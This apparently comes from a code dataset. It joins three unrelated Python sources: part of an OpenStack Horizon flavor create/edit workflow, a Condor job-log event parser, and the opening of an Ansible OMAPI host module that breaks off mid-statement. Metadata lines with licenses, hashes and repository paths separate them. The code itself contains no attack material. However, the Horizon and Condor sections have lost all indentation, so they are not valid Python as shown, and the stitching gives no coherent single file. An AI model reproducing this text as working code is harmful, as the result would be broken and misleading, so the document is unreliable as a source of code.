field_name = self.get_member_field_name('member')
self.fields[field_name] = forms.MultipleChoiceField(required=False)
# Get list of available projects.
all_projects = []
try:
all_projects, has_more = api.keystone.tenant_list(request)
except Exception:
exceptions.handle(request, err_msg)
projects_list = [(project.id, project.name)
for project in all_projects]
self.fields[field_name].choices = projects_list
# If we have a POST from the CreateFlavor workflow, the flavor id
# isn't an existing flavor. For the UpdateFlavor case, we don't care
# about the access list for the current flavor anymore as we're about
# to replace it.
if request.method == 'POST':
return
# Get list of flavor projects if the flavor is not public.
flavor_id = context.get('flavor_id')
flavor_access = []
try:
if flavor_id:
flavor = api.nova.flavor_get(request, flavor_id)
if not flavor.is_public:
flavor_access = [project.tenant_id for project in
api.nova.flavor_access_list(request,
flavor_id)]
except Exception:
exceptions.handle(request, err_msg)
self.fields[field_name].initial = flavor_access
class Meta(object):
name = _("Flavor Access")
slug = "update_flavor_access"
class UpdateFlavorAccess(workflows.UpdateMembersStep):
action_class = UpdateFlavorAccessAction
help_text = _("Select the projects where the flavors will be used. If no "
"projects are selected, then the flavor will be available "
"in all projects.")
available_list_title = _("All Projects")
members_list_title = _("Selected Projects")
no_available_text = _("No projects found.")
no_members_text = _("No projects selected. "
"All projects can use the flavor.")
show_roles = False
depends_on = ("flavor_id",)
contributes = ("flavor_access",)
def contribute(self, data, context):
if data:
member_field_name = self.get_member_field_name('member')
context['flavor_access'] = data.get(member_field_name, [])
return context
class CreateFlavor(workflows.Workflow):
slug = "create_flavor"
name = _("Create Flavor")
finalize_button_name = _("Create Flavor")
success_message = _('Created new flavor "%s".')
failure_message = _('Unable to create flavor "%s".')
success_url = "horizon:admin:flavors:index"
default_steps = (CreateFlavorInfo,
UpdateFlavorAccess)
def format_status_message(self, message):
return message % self.context['name']
def handle(self, request, data):
flavor_id = data.get('flavor_id') or 'auto'
flavor_access = data['flavor_access']
is_public = not flavor_access
# Create the flavor
try:
self.object = api.nova.flavor_create(request,
name=data['name'],
memory=data['memory_mb'],
vcpu=data['vcpus'],
disk=data['disk_gb'],
ephemeral=data['eph_gb'],
swap=data['swap_mb'],
flavorid=flavor_id,
is_public=is_public)
except Exception:
exceptions.handle(request, _('Unable to create flavor.'))
return False
# Update flavor access if the new flavor is not public
flavor_id = self.object.id
for project in flavor_access:
try:
api.nova.add_tenant_to_flavor(
request, flavor_id, project)
except Exception:
exceptions.handle(
request,
_('Unable to set flavor access for project %s.') % project)
return True
class UpdateFlavorInfoAction(CreateFlavorInfoAction):
flavor_id = forms.CharField(widget=forms.widgets.HiddenInput)
class Meta(object):
name = _("Flavor Information")
slug = 'update_info'
help_text = _("Edit the flavor details. Flavors define the sizes for "
"RAM, disk, number of cores, and other resources. "
"Flavors are selected when users deploy instances.")
def clean(self):
name = self.cleaned_data.get('name')
flavor_id = self.cleaned_data.get('flavor_id')
try:
flavors = api.nova.flavor_list(self.request, None)
except Exception:
flavors = []
msg = _('Unable to get flavor list')
exceptions.check_message(["Connection", "refused"], msg)
raise
# Check if there is no flavor with the same name
if flavors is not None:
for flavor in flavors:
if flavor.name == name and flavor.id != flavor_id:
raise forms.ValidationError(
_('The name "%s" is already used by another '
'flavor.') % name)
return self.cleaned_data
class UpdateFlavorInfo(workflows.Step):
action_class = UpdateFlavorInfoAction
depends_on = ("flavor_id",)
contributes = ("name",
"vcpus",
"memory_mb",
"disk_gb",
"eph_gb",
"swap_mb")
class UpdateFlavor(workflows.Workflow):
slug = "update_flavor"
name = _("Edit Flavor")
finalize_button_name = _("Save")
success_message = _('Modified flavor "%s".')
failure_message = _('Unable to modify flavor "%s".')
success_url = "horizon:admin:flavors:index"
default_steps = (UpdateFlavorInfo,
UpdateFlavorAccess)
def format_status_message(self, message):
return message % self.context['name']
def handle(self, request, data):
flavor_projects = data["flavor_access"]
is_public = not flavor_projects
# Update flavor information
try:
flavor_id = data['flavor_id']
# Grab any existing extra specs, because flavor edit is currently
# implemented as a delete followed by a create.
extras_dict = api.nova.flavor_get_extras(self.request,
flavor_id,
raw=True)
# Mark the existing flavor as deleted.
api.nova.flavor_delete(request, flavor_id)
# Then create a new flavor with the same name but a new ID.
# This is in the same try/except block as the delete call
# because if the delete fails the API will error out because
# active flavors can't have the same name.
flavor = api.nova.flavor_create(request,
data['name'],
data['memory_mb'],
data['vcpus'],
data['disk_gb'],
ephemeral=data['eph_gb'],
swap=data['swap_mb'],
is_public=is_public)
if (extras_dict):
api.nova.flavor_extra_set(request, flavor.id, extras_dict)
except Exception:
exceptions.handle(request, ignore=True)
return False
# Add flavor access if the flavor is not public.
for project in flavor_projects:
try:
api.nova.add_tenant_to_flavor(request, flavor.id, project)
except Exception:
exceptions.handle(request, _('Modified flavor information, '
'but unable to modify flavor '
'access.'))
return True
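
# Illustrative wiring sketch (added for clarity; not part of the original
# module). In Horizon these workflows are typically attached to a
# WorkflowView subclass in the panel's views.py, roughly:
#
#     class CreateFlavorView(workflows.WorkflowView):
#         workflow_class = CreateFlavor
#
# The view class name is an assumption for illustration; only the workflow
# classes above are defined in this module.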
| apache-2.0 | -4,819,797,779,899,520,000 | 39.946203 | 79 | 0.524152 | false |
bbockelm/condor-network-accounting | src/condor_utils/condor_log_reader.py | 10 | 24479 | #! /usr/bin/env python
##**************************************************************
##
## Copyright (C) 1990-2008, Condor Team, Computer Sciences Department,
## University of Wisconsin-Madison, WI.
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You may
## obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
##**************************************************************
import re
import os
import sys
import time
# Static global data( yeah, yuck)
class EventPatterns( object ):
def __init__( self ) :
self.__re_hdr = re.compile( '(\d{3}) \((\d+)\.(\d+)\.(\d+)\) ' +
'(\d+/\d+ \d+:\d+:\d+) (.*)' )
def IsSeparatorLine( self, line ) :
return line == "..."
def HasSeparator( self, line ) :
return line.find( "..." ) >= 0
def IsHeaderLine( self, line ) :
m = self.__re_hdr.match( line )
return m is not None
def LineHasHeader( self, line ) :
m = self.__re_hdr.search( line )
return m is not None
def FindHeaderInLine( self, line, match = True ) :
m = None
if match :
m = self.__re_hdr.match( line )
else :
m = self.__re_hdr.search( line )
if m is None :
return None
return m
_patterns = EventPatterns( )
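
# Illustrative header line (added for clarity; not part of the original
# module). The regular expression above matches Condor user-log event
# headers of the form (values made up):
#
#     000 (123.000.000) 01/15 10:35:30 Job submitted from host: <10.0.0.1:1234>
#
# i.e. a three-digit event number, the (cluster.proc.subproc) job id, a
# month/day time stamp without a year, and free-form trailing text.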
# Event header class
class EventHeader( object ) :
def __init__( self, event_num, cluster, proc, subproc, time, text):
self.__event_num = event_num
self.__cluster = cluster
self.__proc = proc
self.__subproc = subproc
self.__time = time
self.__text = text
self.__line = None
self.__line_num = None
self.__file_name = None
def EventNum( self ) :
return self.__event_num
def IsEvent( self, event_num ) :
return event_num == self.__event_num
def Cluster( self ) :
return self.__cluster
def Proc( self ) :
return self.__proc
def SubProc( self ) :
return self.__subproc
def JobId( self ) :
return "%d.%d.%d" % ( self.__cluster, self.__proc, self.__subproc )
def Time( self ) :
return self.__time
def Text( self ) :
return self.__text
def SetLineInfo( self, filename, line_num, line ) :
self.__file_name = filename
self.__line_num = line_num
self.__line = line
def LineText( self ) :
return self.__line
def LineNum( self ) :
return self.__line_num
def SetLineNum( self, num ) :
return self.__line_num
def FileName( self ) :
return self.__file_name
class EventMisMatchException( Exception ) :
pass
class EventVerifyException( Exception ) :
pass
# Event verification class
class EventVerifier( object ) :
# Event verifier patterns class
class Pattern( object ) :
def __init__( self, lnum, string, where = 0, pos = 0, expect = True ) :
self.__lnum = lnum # Line #
self.__string = string # String to search for
self.__where = where # -1=endswith,0=find,1=startswith
self.__pos = pos # position
self.__expect = expect
def Verify( self, event ) :
            line = event.FullText(self.__lnum)
            found = False
            op = ""
            if self.__where < 0 :
                found = line.endswith(self.__string, self.__pos)
                op = "endswith"
            elif self.__where > 0 :
                found = line.startswith(self.__string, self.__pos)
                op = "startswith"
            else :
                # str.find() returns an offset; normalize it to a boolean so
                # all three branches can be checked the same way below
                found = line.find(self.__string, self.__pos) >= 0
                op = "find"
            if self.__expect :
                if not found :
                    return "line # %d '%s' : '%s' not found (%s) @ %d" % \
                        ( self.__lnum, line, self.__string, op, self.__pos )
            else :
                if found :
                    return "line # %d '%s' : '%s' found (%s) @ %d" % \
                        ( self.__lnum, line, self.__string, op, self.__pos )
            return None
def __init__( self,
min_body_lines = None,
max_body_lines = None,
patterns = None ) :
self._patterns = patterns
self._min_body_lines = min_body_lines
self._max_body_lines = max_body_lines
def Verify( self, event, level ) :
s = "Event @ line # %d (%s): "%(event.LineNum(0), event.EventNameUc() )
if self._min_body_lines is not None and \
event.NumBodyLines() < self._min_body_lines :
s += "Too few lines (%d < %d)" % \
( event.NumBodyLines(), self._min_body_lines )
raise EventVerifyException( s )
if self._max_body_lines is not None and \
event.NumBodyLines() > self._max_body_lines :
s += "Too many lines (%d < %d)" % \
( event.NumBodyLines(), self._max_body_lines )
raise EventVerifyException( s )
if self._patterns is not None :
for pattern in self._patterns :
ps = pattern.Verify( event )
if ps is not None :
raise EventVerifyException( ps )
if level >= 1 :
for n in range(1, event.NumLines()-1 ) :
                line = event.FullText(n)
s = "Event @ line # %d (%s): " % ( event.LineNum(n),
event.EventNameUc() )
if _patterns.HasSeparator( line ) :
raise EventVerifyException( s + " '...' separator found" )
if _patterns.LineHasHeader( line ) :
raise EventVerifyException( s + " header found" )
# Base event information class
class BaseEvent( object ) :
def __init__( self, event_num = None, event_name = None,
real_class = None, other = None ) :
if other is not None :
self._event_num = other.EventNum()
self._event_name = other.EventName()
else :
self._event_num = event_num
self._event_name = event_name
self._real_class = real_class
def EventNum( self ) :
return self._event_num
def EventName( self ) :
return self._event_name
def EventNameUc( self ) :
return self._event_name.upper()
def HeaderNumCheck( self, header ) :
return header.IsEvent( self.EventNum() )
def SetVerifier( self, verifier = None ) :
self._verifier = verifier
def GenRealEvent( self, header ) :
assert self._real_class is not None
return self._real_class( self, header )
# Base 'real' event class
class BaseRealEvent( BaseEvent ) :
def __init__(self, info, header ) :
BaseEvent.__init__( self, other = info )
self._header = header
self._lines = []
if not header.IsEvent( self._event_num ) :
raise EventMisMatchException
self._lines.append( header.LineText() )
self._verifier = None
def NumLines( self ) :
return len(self._lines)
# Lines excluding header and separator
def NumBodyLines( self ) :
return len(self._lines) - 2
def LineNum( self, num = 0 ) :
return self._header.LineNum() + num
def FullText( self, line_num = None ) :
if line_num is not None :
return self._lines[line_num]
else :
return self._lines
def GetHostFromText( self, text ) :
m = re.search( '(<\d+\.\d+\.\d+\.\d+:\d+>)', text )
if m is not None :
return m.group(1)
else :
return None
def GetHostFromHeader( self ) :
assert self._header
return self.GetHostFromText( self._header.Text() )
def GetHeader( self ) :
return self._header
# By default, keep reading 'til we get a "..."
def ProcessEventLine( self, line ) :
self._lines.append( line )
return _patterns.IsSeparatorLine( line )
def Verify( self, level = 0 ):
if self._verifier is not None :
return self._verifier.Verify( self, level )
return None
def Print( self, full = False ) :
print "Event %s (%d) @ line %d (%d body lines)%s" % \
( self.EventNameUc(), self.EventNum(),
self.LineNum(), self.NumBodyLines(),
(":" if full else "") )
if full :
for l in self._lines :
print l
# Job submitted ULOG_SUBMIT = 0
class SubmitEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
self._host = self.GetHostFromHeader()
def __init__( self ) :
BaseEvent.__init__( self, 0, "submit", self.RealEvent )
patterns = ( EventVerifier.Pattern(0, "Job submitted", 1), )
self.SetVerifier( EventVerifier( patterns, 0, None ) )
def EventNum( self ) :
return 0
# Job now running ULOG_EXECUTE = 1
class ExecuteEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
self._host = self.GetHostFromHeader()
def __init__( self ) :
BaseEvent.__init__( self, 1, "execute", self.RealEvent )
patterns = (EventVerifier.Pattern( 0, "Job executing", 1), )
self.SetVerifier( EventVerifier( patterns, 0, 0 ) )
def EventNum( self ) :
return 1
# Error in executable ULOG_EXECUTABLE_ERROR = 2
class ExecutableErrorEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 2, "executable error", BaseRealEvent )
def EventNum( self ) :
return 2
# Job was checkpointed ULOG_CHECKPOINTED = 3
class CheckpointEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 3, "checkpointed", BaseRealEvent )
def EventNum( self ) :
return 3
# Job evicted from machine ULOG_JOB_EVICTED = 4
class JobEvictedEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
def __init__( self ) :
BaseEvent.__init__( self, 4, "evicted", self.RealEvent )
patterns = ( EventVerifier.Pattern(0, "evicted.", -1),
EventVerifier.Pattern(1, "checkpointed.", -1),
EventVerifier.Pattern(2, "Remote Usage", -1),
EventVerifier.Pattern(3, "Local Usage", -1),
EventVerifier.Pattern(4, "Sent By Job", -1),
EventVerifier.Pattern(5, "Received By Job", -1),
)
self.SetVerifier( EventVerifier( patterns, 5, 5 ) )
def EventNum( self ) :
return 4
# Job terminated ULOG_JOB_TERMINATED = 5
class JobTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 5, "terminated", BaseRealEvent )
def EventNum( self ) :
return 5
# Image size of job updated ULOG_IMAGE_SIZE = 6
class ImageSizeEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 6, "image size", BaseRealEvent )
def EventNum( self ) :
return 6
# Shadow threw an exception ULOG_SHADOW_EXCEPTION = 7
class ShadowExceptionEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 7, "shadow exception", BaseRealEvent )
def EventNum( self ) :
return 7
# Generic Log Event ULOG_GENERIC = 8
class GenericEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 8, "generic", BaseEvent )
def EventNum( self ) :
return 8
# Job Aborted ULOG_JOB_ABORTED = 9
class JobAbortedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 9, "job aborted", BaseRealEvent )
patterns = ( EventVerifier.Pattern(0, "Job was aborted", 1), )
self.SetVerifier( EventVerifier( patterns, 0, None ) )
def EventNum( self ) :
return 9
# Job was suspended ULOG_JOB_SUSPENDED = 10
class JobSuspendedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 10, "job suspended", BaseRealEvent )
def EventNum( self ) :
return 10
# Job was unsuspended ULOG_JOB_UNSUSPENDED = 11
class JobUnsuspendedEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
def __init__( self ) :
BaseEvent.__init__( self, 11, "job unsuspended", BaseRealEvent )
def EventNum( self ) :
return 11
# Job was held ULOG_JOB_HELD = 12
class JobHeldEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 12, "job held", BaseRealEvent )
def EventNum( self ) :
return 12
# Job was released ULOG_JOB_RELEASED = 13
class JobReleasedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 13, "job released", BaseRealEvent )
def EventNum( self ) :
return 13
# Parallel Node executed ULOG_NODE_EXECUTE = 14
class NodeExecuteEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 14, "node executed", BaseRealEvent )
def EventNum( self ) :
return 14
# Parallel Node terminated ULOG_NODE_TERMINATED = 15
class NodeTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 15, "node terminated", BaseRealEvent )
def EventNum( self ) :
return 15
# POST script terminated ULOG_POST_SCRIPT_TERMINATED = 16
class PostScriptTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 16, "post script terminated", BaseRealEvent )
def EventNum( self ) :
return 16
# Job Submitted to Globus ULOG_GLOBUS_SUBMIT = 17
class GlobusSubmitEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 17, "globus submit", BaseRealEvent )
def EventNum( self ) :
return 17
# Globus Submit failed ULOG_GLOBUS_SUBMIT_FAILED = 18
class GlobusSubmitFailedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 18, "globus submit failed", BaseRealEvent )
def EventNum( self ) :
return 18
# Globus Resource Up ULOG_GLOBUS_RESOURCE_UP = 19
class GlobusResourceUpEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 19, "globus resource up", BaseRealEvent )
def EventNum( self ) :
return 19
# Globus Resource Down ULOG_GLOBUS_RESOURCE_DOWN = 20
class GlobusResourceDownEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 20, "globus resource down", BaseRealEvent )
def EventNum( self ) :
return 20
# Remote Error ULOG_REMOTE_ERROR = 21
class RemoteErrorEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 21, "remote error", BaseRealEvent )
def EventNum( self ) :
return 21
# RSC socket lost ULOG_JOB_DISCONNECTED = 22
class JobDisconnectedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 22, "job disconnected", BaseRealEvent )
def EventNum( self ) :
return 22
# RSC socket re-established ULOG_JOB_RECONNECTED = 23
class JobReconnectedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 23, "job reconnected", BaseRealEvent )
def EventNum( self ) :
return 23
# RSC reconnect failure ULOG_JOB_RECONNECT_FAILED = 24
class JobReconnectFailedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 24, "job reconnect failed", BaseRealEvent )
def EventNum( self ) :
return 24
# Grid Resource Up ULOG_GRID_RESOURCE_UP = 25
class GridResourceUpEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 25, "grid resource up", BaseRealEvent )
def EventNum( self ) :
return 25
# Grid Resource Down ULOG_GRID_RESOURCE_DOWN = 26
class GridResourceDownEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 26, "grid resource down", BaseRealEvent )
def EventNum( self ) :
return 26
# Job Submitted remotely ULOG_GRID_SUBMIT = 27
class GridSubmitEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 27, "grid resource submit", BaseRealEvent )
def EventNum( self ) :
return 27
# Report job ad information ULOG_JOB_AD_INFORMATION = 28
class JobAdInformationEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 28, "job ad information", BaseRealEvent )
def EventNum( self ) :
return 28
class EventParserException( Exception ) :
pass
# Event log parser
class EventParser( object ) :
class EventLookup( object ) :
def __init__( self, event_class ) :
self.__event_class = event_class
try :
self.__event = event_class( )
except Exception, e :
print >> sys.stderr, "Can't create", event_class, ":", e
def HeaderMatch( self, header ) :
return self.__event.HeaderNumCheck( header )
def Type( self ) :
return self.__event_class
def GenEvent( self, header ) :
try:
return self.__event.GenRealEvent( header )
except Exception, e :
print >> sys.stderr, "Can't create", self.__event_class, ":", e
return None
def __init__( self ) :
self._verbose = 0
self._quiet = False
self._year = time.localtime().tm_year
self._year_str = "%04d" % ( self._year )
self.__lookup = (
self.EventLookup( SubmitEvent ),
self.EventLookup( ExecuteEvent ),
self.EventLookup( ExecutableErrorEvent ),
self.EventLookup( CheckpointEvent ),
self.EventLookup( JobEvictedEvent ),
self.EventLookup( JobTerminateEvent ),
self.EventLookup( ImageSizeEvent ),
self.EventLookup( ShadowExceptionEvent ),
self.EventLookup( GenericEvent ),
self.EventLookup( JobAbortedEvent ),
self.EventLookup( JobSuspendedEvent ),
self.EventLookup( JobUnsuspendedEvent ),
self.EventLookup( JobHeldEvent ),
self.EventLookup( JobReleasedEvent ),
self.EventLookup( NodeExecuteEvent ),
self.EventLookup( NodeTerminateEvent ),
self.EventLookup( PostScriptTerminateEvent ),
self.EventLookup( GlobusSubmitFailedEvent ),
self.EventLookup( GlobusResourceUpEvent ),
self.EventLookup( GlobusResourceDownEvent ),
self.EventLookup( RemoteErrorEvent ),
self.EventLookup( JobDisconnectedEvent ),
self.EventLookup( JobReconnectedEvent ),
self.EventLookup( JobReconnectFailedEvent ),
self.EventLookup( GridResourceUpEvent ),
self.EventLookup( GridResourceDownEvent ),
self.EventLookup( GridSubmitEvent ),
)
def Verbose( self, v = None ) :
if v is not None :
self._verbose = v
return self._verbose
def Quiet( self, q = None ) :
if q is not None :
self._quiet = q
return self._quiet
def GenHeaderFromReMatch( self, line, re_match ) :
event_num = int(re_match.group(1))
cluster = int(re_match.group(2))
proc = int(re_match.group(3))
subproc = int(re_match.group(4))
time_str = self._year_str+"/"+re_match.group(5)
text = re_match.group(6)
try:
event_time = time.strptime( time_str, '%Y/%m/%d %H:%M:%S' )
except Exception, e:
print >>sys.stderr, \
"header line time parse error '"+time_str+"':", e
return None
return EventHeader( event_num, cluster, proc, subproc,
event_time, text )
def ParseHeaderLine( self, line ) :
m = _patterns.FindHeaderInLine( line, True )
if m is None :
return None
return self.GenHeaderFromReMatch( line, m )
def GetEventFromHeader( self, header ) :
for lookup in self.__lookup :
if lookup.HeaderMatch( header ) :
return lookup.GenEvent( header )
return None
class EventLogParser( EventParser ) :
def __init__( self, filename ) :
self._filename = filename
try:
self._file = open( filename )
except Exception, e:
s = "Failed to open", filename, ":", e
print >>sys.stderr, s
raise Exception( s )
self._line = None
self._line_num = 0
self._num_events = 0
self._event_counts = { }
EventParser.__init__( self )
def GetFileName( self ) :
return self._filename
def GetFile( self ) :
return self._file
def GetLine( self ) :
return self._line
def GetLineNum( self ) :
return self._line_num
def GetNumEvents( self, name = None ) :
if name is None :
return self._num_events
else :
return self._event_counts.get( name, 0 )
def GetEventNames( self ) :
return self._event_counts.keys()
def ReadEventBody( self, header, fobj ) :
event = self.GetEventFromHeader( header )
if event is None :
s = "%s %d (type %d)" % ( self.GetFileName(),
self.GetLineNum(),
header.EventNum() )
raise EventParserException( s )
# Now, read it from the file
for line in fobj :
line = line.rstrip()
self._line_num += 1
if _patterns.LineHasHeader( line ) :
s = "%s %d: unexpected header" % ( self._filename,
self._line_num )
raise EventParserException( s )
if event.ProcessEventLine( line ) :
break
return event
def ParseLog( self, die ) :
for l in self._file :
self._line = l.rstrip()
self._line_num += 1
header = self.ParseHeaderLine( self._line )
if header is None :
s = "%s line %d: '%s': header line expected" % \
( self._filename, self._line_num, self._line )
self.HandleParseError( s )
continue
header.SetLineInfo( self._filename, self._line_num, self._line )
event = None
try:
event = self.ReadEventBody( header, self._file )
except EventParserException, e:
s = "Invalid event: %s" % ( str(e) )
self.HandleParseError( s )
if event is not None :
self._num_events += 1
name = event.EventName()
if not name in self._event_counts :
self._event_counts[name] = 0
self._event_counts[name] += 1
self.ProcessEvent( event )
if self.Verbose() :
event.Print( self.Verbose() )
def ProcessEvent( self, event ) :
pass
def HandleParseError( self, s ) :
        raise EventParserException( s )
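
# Minimal usage sketch (added for illustration; not part of the original
# module). A caller typically subclasses EventLogParser and overrides
# ProcessEvent(); the log file name below is an assumption:
#
#     class MyLogParser( EventLogParser ) :
#         def ProcessEvent( self, event ) :
#             event.Print( )
#
#     parser = MyLogParser( "condor_job.log" )
#     parser.ParseLog( die = False )
#     print "total events:", parser.GetNumEvents( )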
### Local Variables: ***
### py-indent-offset:4 ***
### python-indent:4 ***
### python-continuation-offset:4 ***
### tab-width:4 ***
### End: ***
| apache-2.0 | 8,822,964,728,051,052,000 | 34.272334 | 79 | 0.544753 | false |
qrkourier/ansible | lib/ansible/modules/net_tools/omapi_host.py | 29 | 11915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Loic Blot <[email protected]>
# Sponsored by Infopro Digital. http://www.infopro-digital.com/
# Sponsored by E.T.A.I. http://www.etai.fr/
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: omapi_host
short_description: Setup OMAPI hosts.
description:
- Create, update and remove OMAPI hosts into compatible DHCPd servers.
version_added: "2.3"
requirements:
- pypureomapi
author: "Loic Blot (@nerzhul)"
options:
state:
description:
- Create or remove OMAPI host.
required: true
choices: ['present', 'absent']
name:
description:
- Sets the host lease hostname (mandatory if state=present).
default: None
host:
description:
- Sets OMAPI server host to interact with.
default: localhost
port:
description:
- Sets the OMAPI server port to interact with.
default: 7911
key_name:
description:
- Sets the TSIG key name for authenticating against OMAPI server.
required: true
key:
description:
- Sets the TSIG key content for authenticating against OMAPI server.
required: true
macaddr:
description:
- Sets the lease host MAC address.
required: true
ip:
description:
- Sets the lease host IP address.
required: false
default: None
statements:
description:
- Attach a list of OMAPI DHCP statements with host lease (without ending semicolon).
required: false
default: []
ddns:
description:
- Enable dynamic DNS updates for this host.
required: false
default: false
'''
EXAMPLES = '''
- name: Remove a host using OMAPI
omapi_host:
key_name: "defomapi"
key: "+bFQtBCta6j2vWkjPkNFtgA=="
host: "10.1.1.1"
macaddr: "00:66:ab:dd:11:44"
state: absent
- name: Add a host using OMAPI
omapi_host:
key_name: "defomapi"
key: "+bFQtBCta6j2vWkjPkNFtgA=="
host: "10.98.4.55"
macaddr: "44:dd:ab:dd:11:44"
name: "server01"
ip: "192.168.88.99"
ddns: yes
statements:
- 'filename "pxelinux.0"'
- 'next-server 1.1.1.1'
state: present
'''
RETURN = '''
changed:
description: If module has modified a host
returned: success
type: string
lease:
description: dictionary containing host information
returned: success
type: complex
contains:
ip-address:
description: IP address, if there is.
returned: success
type: string
sample: '192.168.1.5'
hardware-address:
description: MAC address
returned: success
type: string
sample: '00:11:22:33:44:55'
hardware-type:
description: hardware type, generally '1'
returned: success
type: int
sample: 1
name:
description: hostname
returned: success
type: string
sample: 'mydesktop'
'''
import binascii
import socket
import struct
import traceback
try:
from pypureomapi import Omapi, OmapiMessage, OmapiError, OmapiErrorNotFound
from pypureomapi import pack_ip, unpack_ip, pack_mac, unpack_mac
from pypureomapi import OMAPI_OP_STATUS, OMAPI_OP_UPDATE
pureomapi_found = True
except ImportError:
pureomapi_found = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_native
class OmapiHostManager:
def __init__(self, module):
self.module = module
self.omapi = None
self.connect()
def connect(self):
try:
self.omapi = Omapi(self.module.params['host'], self.module.params['port'], self.module.params['key_name'],
self.module.params['key'])
except binascii.Error:
self.module.fail_json(msg="Unable to open OMAPI connection. 'key' is not a valid base64 key.")
except OmapiError as e:
self.module.fail_json(msg="Unable to open OMAPI connection. Ensure 'host', 'port', 'key' and 'key_name' "
"are valid. Exception was: %s" % to_native(e))
except socket.error as e:
self.module.fail_json(msg="Unable to connect to OMAPI server: %s" % to_native(e))
def get_host(self, macaddr):
msg = OmapiMessage.open(to_bytes("host", errors='surrogate_or_strict'))
msg.obj.append((to_bytes("hardware-address", errors='surrogate_or_strict'), pack_mac(macaddr)))
msg.obj.append((to_bytes("hardware-type", errors='surrogate_or_strict'), struct.pack("!I", 1)))
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_UPDATE:
return None
return response
@staticmethod
def unpack_facts(obj):
result = dict(obj)
if 'hardware-address' in result:
result['hardware-address'] = unpack_mac(result['hardware-address'])
if 'ip-address' in result:
result['ip-address'] = unpack_ip(result['ip-address'])
if 'hardware-type' in result:
result['hardware-type'] = struct.unpack("!I", result['hardware-type'])
return result
def setup_host(self):
if self.module.params['hostname'] is None or len(self.module.params['hostname']) == 0:
self.module.fail_json(msg="name attribute could not be empty when adding or modifying host.")
msg = None
host_response = self.get_host(self.module.params['macaddr'])
# If host was not found using macaddr, add create message
if host_response is None:
msg = OmapiMessage.open(to_bytes('host', errors='surrogate_or_strict'))
msg.message.append(('create', struct.pack('!I', 1)))
msg.message.append(('exclusive', struct.pack('!I', 1)))
msg.obj.append(('hardware-address', pack_mac(self.module.params['macaddr'])))
msg.obj.append(('hardware-type', struct.pack('!I', 1)))
msg.obj.append(('name', self.module.params['hostname']))
if self.module.params['ip'] is not None:
msg.obj.append((to_bytes("ip-address", errors='surrogate_or_strict'), pack_ip(self.module.params['ip'])))
stmt_join = ""
if self.module.params['ddns']:
stmt_join += 'ddns-hostname "{0}"; '.format(self.module.params['hostname'])
try:
if len(self.module.params['statements']) > 0:
stmt_join += "; ".join(self.module.params['statements'])
stmt_join += "; "
except TypeError as e:
self.module.fail_json(msg="Invalid statements found: %s" % to_native(e),
exception=traceback.format_exc())
if len(stmt_join) > 0:
msg.obj.append(('statements', stmt_join))
try:
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_UPDATE:
self.module.fail_json(msg="Failed to add host, ensure authentication and host parameters "
"are valid.")
self.module.exit_json(changed=True, lease=self.unpack_facts(response.obj))
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
# Forge update message
else:
response_obj = self.unpack_facts(host_response.obj)
fields_to_update = {}
if to_bytes('ip-address', errors='surrogate_or_strict') not in response_obj or \
unpack_ip(response_obj[to_bytes('ip-address', errors='surrogate_or_strict')]) != self.module.params['ip']:
fields_to_update['ip-address'] = pack_ip(self.module.params['ip'])
# Name cannot be changed
if 'name' not in response_obj or response_obj['name'] != self.module.params['hostname']:
self.module.fail_json(msg="Changing hostname is not supported. Old was %s, new is %s. "
"Please delete host and add new." %
